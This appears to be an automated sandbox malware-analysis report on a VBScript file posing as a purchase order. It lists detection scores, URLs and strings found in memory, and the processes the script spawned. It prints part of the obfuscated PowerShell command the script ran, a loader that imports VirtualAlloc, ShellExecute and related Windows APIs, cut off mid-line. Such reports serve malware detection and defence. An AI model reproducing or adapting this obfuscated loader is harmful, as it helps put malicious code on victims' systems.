Source: SIEM_PO00938467648.vbs |
ReversingLabs: Detection: 34% |
Source: http://pesterbdd.com/images/Pester.png7z |
Avira URL Cloud: Label: malware |
Source: C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.dll |
Joe Sandbox ML: detected |
Source: |
Binary string: ,l7C:\Users\user\AppData\Local\Temp\jadyuuoq\jadyuuoq.pdb source: powershell.exe, 00000003.00000002.833248284.00000000053E0000.00000004.00000800.00020000.00000000.sdmp |
Source: powershell.exe, 00000003.00000002.820596079.000000000319B000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000003.00000003.499891635.0000000007E61000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000003.485360796.0000000007E5D000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://crl.microsof |
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png7z |
Source: powershell.exe, 00000003.00000002.823390885.0000000004CA1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html7z |
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000003.00000002.825069485.0000000004DDE000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester7z |
Source: powershell.exe, 00000003.00000002.843893534.0000000005CFF000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: Process Memory Space: powershell.exe PID: 2528, type: MEMORYSTR |
Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen |
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows |
|
Source: C:\Windows\System32\wscript.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo S |